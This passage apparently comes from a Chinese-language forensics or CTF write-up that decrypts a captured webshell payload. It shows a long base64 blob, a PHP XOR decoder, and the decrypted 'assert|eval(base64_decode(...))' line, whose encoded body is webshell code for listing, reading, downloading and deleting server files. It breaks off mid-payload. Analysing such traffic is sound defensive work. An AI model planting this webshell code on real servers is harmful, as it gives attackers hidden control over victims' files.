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N9W2NofE8qD1hVIGhWVHF3clZwc3NSKiVyBS16eFhbWWVLXWdKBTQfeRYHC1paYGdyCHB3eF0AVGZQKn8AX1pZfUdjd2daKS5xCgB+XlR0XXJYD3wZDFY/QgVRWA9+DVtaYA4HS3hVKhgBUQ9Qfw1EUnkMfEcHVgdgDFFbeBx3XXpWdVlzXgAhdVIFenhGcXNpQVt3ZE8CPkMOL3prRGFsYV5yY1kCJzdcBS16eFRxd3JWcHNzUiolcQ49C1FFcXNlRGADeAAALmINBVd3RVpYCl1bXXxDOSFmDS5xc19bB2VCXXNZRikgCjY2b3dna2EKfm5JVkcpVwMSK04JeHF3clZwc3NSKiVyBS16eFRhWnldYGdBAic3XAUtenhUcXdyVnB3YFk5C3VTBnFoBXxlXFZwc3NSKiVyBS16eFRxd3FYWl1kXQIcQCwnUHhUcXdxCH1hQgwnN1wsJ1RjAlpZfQFYZwtAKiFlFz0KcwZbfGJec3dgXQchdhEufk1fXWdYf3peQXsgAV8SPlBeW2JsWwFjZwdPAjEKFzwLQUVhY2FdY3NVWwFVcQ4GV3dJWndQQXJhAn4qJXIFLXhVBHxlXFZwc3NSIDdfDwYKcFxyc1gIdHRBXgIySxgAcXNAYmMHXnN3YF0HIXYSK0BrQ3NNQEFweEF7IA9yBS16eHl7ZVhWc3dgXQchdQAuflVXcXADVnN3YF0HIXUALn5VV2BdYUNjaF5XKSFYEClqYEt2YgMGcHECfiolcgUteFJ5e2wDf3pXWX8gPnkOAHFvSlpdclpjd3QFOjJALCdQeFRxd3J7X2ECfiolcgUtfm9AWwZmf3pZc1IqJXIoAU4JeHF3clZwcVl/AAtlUgBhc0ZxcwpGY2cHTwBUSwQ+bgxZW1pfRl1zVV45IXVSPWpOVHFfdXdsSndMLCV6ES16a0FibFhBdkcCfiolcgUteFUKfGVDCHN3A0M5IWZbLVR3SmJjdQFjY3sCKS5xCgB+XgpxX34HdQNWBgcfChs+bn9YWmNmRHcDXVwsH2EIBgsMA2JjBgFpY3h6LlV2VgdXVVlhBHVzbGZeby0waRUxVX9xaWF1c2hldHcyM3kKNWx/cWlhdXNoZXR3MlRlNTVTd3VpX3V3aFxwXQY+VwwyVXdwWmN1aXdnRn8wIHkUM1V3cFpjeXlrXQdlORxxLjNUCAdZclxLXXhkVDUhYTsyfX94bHJUS2xeXm81V0MWMQhdfGJZdWRvXWhdNRxmFTBtd3ldWX5IW3hkVC4yW1YwUmt9XV8CQGpoQlg2M3UhNVJ/aWlhdWNbdWh3MjF9LzVvf3FpX19la2V4dzI+WyE1bH9dawR1WHRmdFkuMlsgNWx/ZWlfV2NdAHR3MjN1IDVsf3FpYXVzaGV0dzIzdTE2VX9wXWF1eW9ldG82M3kQNWxaRGliQ2NoaGR3MRxxIDNSf3FpYXVybGVGdzYzeQgwVXNKXHFXa2NcaHc2CmUqNW9/cWIEdXNoZXR3MjN2Wy1TSn17WQJZWGcGWikhAhQ+fmxAcnxxWV13VUYpIX0UBldrX1paYkF2Rw8IRE8aWQ==';$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }print $post;}?>

懒狗没在电脑安装php环境,就直接在kali跑


解密结果如下:

assert|eval(base64_decode('DQplcnJvcl9yZXBvcnRpbmcoMCk7DQpoZWFkZXIoJ0NvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04Jyk7DQoNCmZ1bmN0aW9uIGdldFNhZmVTdHIoJHN0cil7DQogICAgJHMxID0gaWNvbnYoJ3V0Zi04JywnZ2JrLy9JR05PUkUnLCRzdHIpOw0KICAgICRzMCA9IGljb252KCdnYmsnLCd1dGYtOC8vSUdOT1JFJywkczEpOw0KICAgIGlmKCRzMCA9PSAkc3RyKXsNCiAgICAgICAgcmV0dXJuICRzMDsNCiAgICB9ZWxzZXsNCiAgICAgICAgcmV0dXJuIGljb252KCdnYmsnLCd1dGYtOC8vSUdOT1JFJywkc3RyKTsNCiAgICB9DQp9DQpmdW5jdGlvbiBnZXRnYmtTdHIoJHN0cil7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgJHMxID0gaWNvbnYoJ3V0Zi04JywnZ2JrLy9JR05PUkUnLCRzdHIpOw0KICAgIGlmKCRzMSA9PSAkc3RyKXsNCiAgICAgICAgcmV0dXJuICRzMTsNCiAgICB9ZWxzZXsNCiAgICAgICAgcmV0dXJuIGljb252KCd1dGYtOCcsJ2diay8vSUdOT1JFJywkc3RyKTsNCiAgICB9DQp9DQpmdW5jdGlvbiBkZWxEaXIoJGRpcikNCnsNCiAgICAkZmlsZXMgPSBhcnJheV9kaWZmKHNjYW5kaXIoJGRpciksIGFycmF5KA0KICAgICAgICAnLicsDQogICAgICAgICcuLicNCiAgICApKTsNCiAgICBmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpIHsNCiAgICAgICAgKGlzX2RpcigiJGRpci8kZmlsZSIpKSA/IGRlbFRyZWUoIiRkaXIvJGZpbGUiKSA6IHVubGluaygiJGRpci8kZmlsZSIpOw0KICAgIH0NCiAgICByZXR1cm4gcm1kaXIoJGRpcik7DQp9DQoNCmZ1bmN0aW9uIG1haW4oJG1vZGUsICRwYXRoID0gIi4iLCAkY29udGVudCA9ICIiLCAkY2hhcnNldCA9ICIiKQ0Kew0KCSRwYXRoPWdldGdia1N0cigkcGF0aCk7DQogICAgJHJlc3VsdCA9IGFycmF5KCk7DQogICAgaWYgKCRwYXRoID09ICIuIikNCiAgICAgICAgJHBhdGggPSBnZXRjd2QoKTsNCiAgICBzd2l0Y2ggKCRtb2RlKSB7DQogICAgICAgIGNhc2UgImxpc3QiOg0KICAgICAgICAgICAgJGFsbEZpbGVzID0gc2NhbmRpcigkcGF0aCk7DQogICAgICAgICAgICAkb2JqQXJyID0gYXJyYXkoKTsNCiAgICAgICAgICAgIGZvcmVhY2ggKCRhbGxGaWxlcyBhcyAkZmlsZU5hbWUpIHsNCiAgICAgICAgICAgICAgICAkZnVsbFBhdGggPSAkcGF0aCAuICRmaWxlTmFtZTsNCiAgICAgICAgICAgICAgICBpZiAoIWZ1bmN0aW9uX2V4aXN0cygibWJfY29udmVydF9lbmNvZGluZyIpKQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICRmaWxlTmFtZT1nZXRTYWZlU3RyKCRmaWxlTmFtZSk7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgCSRmaWxlTmFtZT1tYl9jb252ZXJ0X2VuY29kaW5nKCRmaWxlTmFtZSwgJ1VURi04JywgbWJfZGV0ZWN0X2VuY29kaW5nKCRmaWxlTmFtZSwgIlVURi04LEdCSyIpKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgJG9iaiA9IGFycmF5KA0KICAgICAgICAgICAgICAgICAgICAibmFtZSIgPT4gYmFzZTY0X2VuY29kZSgkZmlsZU5hbWUpLA0KICAgICAgICAgICAgICAgICAgICAic2l6ZSIgPT4gYmFzZTY0X2VuY29kZShmaWxlc2l6ZSgkZnVsbFBhdGgpKSwNCiAgICAgICAgICAgICAgICAgICAgImxhc3RNb2RpZmllZCIgPT4gYmFzZTY0X2VuY29kZShkYXRlKCJZLW0tZCBIOmk6cyIsIGZpbGVtdGltZSgkZnVsbFBhdGgpKSkNCiAgICAgICAgICAgICAgICApOw0KICAgICAgICAgICAgICAgICRvYmpbInBlcm0iXSA9IGlzX3JlYWRhYmxlKCRmdWxsUGF0aCkgLiAiLCIgLiBpc193cml0YWJsZSgkZnVsbFBhdGgpIC4gIiwiIC4gaXNfZXhlY3V0YWJsZSgkZnVsbFBhdGgpOw0KICAgICAgICAgICAgICAgIGlmIChpc19maWxlKCRmdWxsUGF0aCkpIHsNCiAgICAgICAgICAgICAgICAgICAgJG9ialsidHlwZSJdID0gYmFzZTY0X2VuY29kZSgiZmlsZSIpOw0KICAgICAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgICAgICRvYmpbInR5cGUiXSA9IGJhc2U2NF9lbmNvZGUoImRpcmVjdG9yeSIpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBhcnJheV9wdXNoKCRvYmpBcnIsICRvYmopOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgICAgICAgICAkcmVzdWx0WyJtc2ciXSA9IGJhc2U2NF9lbmNvZGUoanNvbl9lbmNvZGUoJG9iakFycikpOw0KICAgICAgICAgICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCAkX1NFU1NJT05bJ2snXSk7DQogICAgICAgICAgICBicmVhazsNCiAgICAgICAgY2FzZSAic2hvdyI6DQogICAgICAgICAgICAkY29udGVudHMgPSBmaWxlX2dldF9jb250ZW50cygkcGF0aCk7ICAgICAgICAgICAgICAgDQogICAgICAgICAgICAkcmVzdWx0WyJzdGF0dXMiXSA9IGJhc2U2NF9lbmNvZGUoInN1Y2Nlc3MiKTsNCiAgICAgICAgICAgIGlmIChmdW5jdGlvbl9leGlzdHMoIm1iX2NvbnZlcnRfZW5jb2RpbmciKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBpZiAoJGNoYXJzZXQ9PSIiKQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgJGNoYXJzZXQgPSBtYl9kZXRlY3RfZW5jb2RpbmcoJGNvbnRlbnRzLCBhcnJheSgNCiAgICAgICAgICAgICAgICAgICAgICAgICdHQjIzMTInLA0KICAgICAgICAgICAgICAgICAgICAgICAgJ0dCSycsDQogICAgICAgICAgICAgICAgICAgICAgICAnVVRGLTE2JywNCiAgICAgICAgICAgICAgICAgICAgICAgICdVQ1MtMicsDQogICAgICAgICAgICAgICAgICAgICAgICAnVVRGLTgnLA0KICAgICAgICAgICAgICAgICAgICAgICAgJ0JJRzUnLA0KICAgICAgICAgICAgICAgICAgICAgICAgJ0FTQ0lJJw0KICAgICAgICAgICAgICAgICAgICApKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKG1iX2NvbnZlcnRfZW5jb2RpbmcoJGNvbnRlbnRzLCAiVVRGLTgiLCAkY2hhcnNldCkpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIGlmICgkY2hhcnNldD09IiIpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAkcmVzdWx0WyJtc2ciXSA9IGJhc2U2NF9lbmNvZGUoZ2V0U2FmZVN0cigkY29udGVudHMpKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgZWxzZQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKGljb252KCRjaGFyc2V0LCAndXRmLTgvL0lHTk9SRScsICRjb250ZW50cykpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgICRyZXN1bHQgPSBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCRfU0VTU0lPTlsnayddKTsNCiAgICAgICAgICAgIGVjaG8gJHJlc3VsdDsNCiAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICBjYXNlICJkb3dubG9hZCI6DQogICAgICAgICAgICBpZiAoISBmaWxlX2V4aXN0cygkcGF0aCkpIHsNCiAgICAgICAgICAgICAgICBoZWFkZXIoJ0hUVFAvMS4xIDQwNCBOT1QgRk9VTkQnKTsNCiAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgJGZpbGUgPSBmb3BlbigkcGF0aCwgInJiIik7DQogICAgICAgICAgICAgICAgZWNobyBmcmVhZCgkZmlsZSwgZmlsZXNpemUoJHBhdGgpKTsNCiAgICAgICAgICAgICAgICBmY2xvc2UoJGZpbGUpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIGNhc2UgImRlbGV0ZSI6DQogICAgICAgICAgICBpZiAoaXNfZmlsZSgkcGF0aCkpIHsNCiAgICAgICAgICAgICAgICBpZiAodW5saW5rKCRwYXRoKSkgew0KICAgICAgICAgICAgICAgICAgICAkcmVzdWx0WyJzdGF0dXMiXSA9IGJhc2U2NF9lbmNvZGUoInN1Y2Nlc3MiKTsNCiAgICAgICAgICAgICAgICAgICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRwYXRoIC4gIuWIoOmZpOaIkOWKnyIpOw0KICAgICAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgICAgICRyZXN1bHRbInN0YXR1cyJdID0gYmFzZTY0X2VuY29kZSgiZmFpbCIpOw0KICAgICAgICAgICAgICAgICAgICAkcmVzdWx0WyJtc2ciXSA9IGJhc2U2NF9lbmNvZGUoJHBhdGggLiAi5Yig6Zmk5aSx6LSlIik7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgaWYgKGlzX2RpcigkcGF0aCkpIHsNCiAgICAgICAgICAgICAgICBkZWxEaXIoJHBhdGgpOw0KICAgICAgICAgICAgICAgICRyZXN1bHRbInN0YXR1cyJdID0gYmFzZTY0X2VuY29kZSgic3VjY2V